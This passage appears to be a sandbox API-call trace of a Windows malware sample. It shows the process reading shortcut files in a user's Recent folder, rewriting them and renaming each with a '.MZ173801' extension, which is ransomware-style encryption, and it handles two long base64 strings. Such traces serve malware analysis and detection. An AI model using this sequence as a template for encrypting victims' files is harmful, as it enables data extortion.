lpLocalFileTime=0x19fa5c) returned 1 [0110.120] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OBs8J_Fu4-ilYu.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\obs8j_fu4-ilyu.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8c05d6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea8c05d6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea8c05d6, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x47d)) returned 1 [0110.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.121] GetCurrentThreadId () returned 0x1358 [0110.121] GetCurrentThreadId () returned 0x1358 [0110.121] GetCurrentThreadId () returned 0x1358 [0110.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.122] GetCurrentThreadId () returned 0x1358 [0110.122] GetCurrentThreadId () returned 0x1358 [0110.122] GetCurrentThreadId () returned 0x1358 [0110.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OBs8J_Fu4-ilYu.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\obs8j_fu4-ilyu.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.122] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.122] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.122] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x47d [0110.123] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.123] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x47d, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x47d, lpOverlapped=0x0) returned 1 [0110.124] CloseHandle (hObject=0x3f4) returned 1 [0110.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OBs8J_Fu4-ilYu.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\obs8j_fu4-ilyu.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.125] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x47d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x47d, lpOverlapped=0x0) returned 1 [0110.348] CloseHandle (hObject=0x3f4) returned 1 [0110.349] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OBs8J_Fu4-ilYu.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\obs8j_fu4-ilyu.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\OBs8J_Fu4-ilYu.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\obs8j_fu4-ilyu.flv.lnk.mz173801")) returned 1 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] GetCurrentThreadId () returned 0x1358 [0110.350] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f1be16, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f1be16, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75f1be16, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ONXmEb1WE6Xl.lnk", cAlternateFileName="ONXMEB~1.LNK")) returned 1 [0110.350] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.351] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ONXmEb1WE6Xl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\onxmeb1we6xl.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f1be16, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f1be16, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75f1be16, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e5)) returned 1 [0110.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.352] GetCurrentThreadId () returned 0x1358 [0110.352] GetCurrentThreadId () returned 0x1358 [0110.352] GetCurrentThreadId () returned 0x1358 [0110.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.353] GetCurrentThreadId () returned 0x1358 [0110.353] GetCurrentThreadId () returned 0x1358 [0110.353] GetCurrentThreadId () returned 0x1358 [0110.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ONXmEb1WE6Xl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\onxmeb1we6xl.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.353] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.353] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.353] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 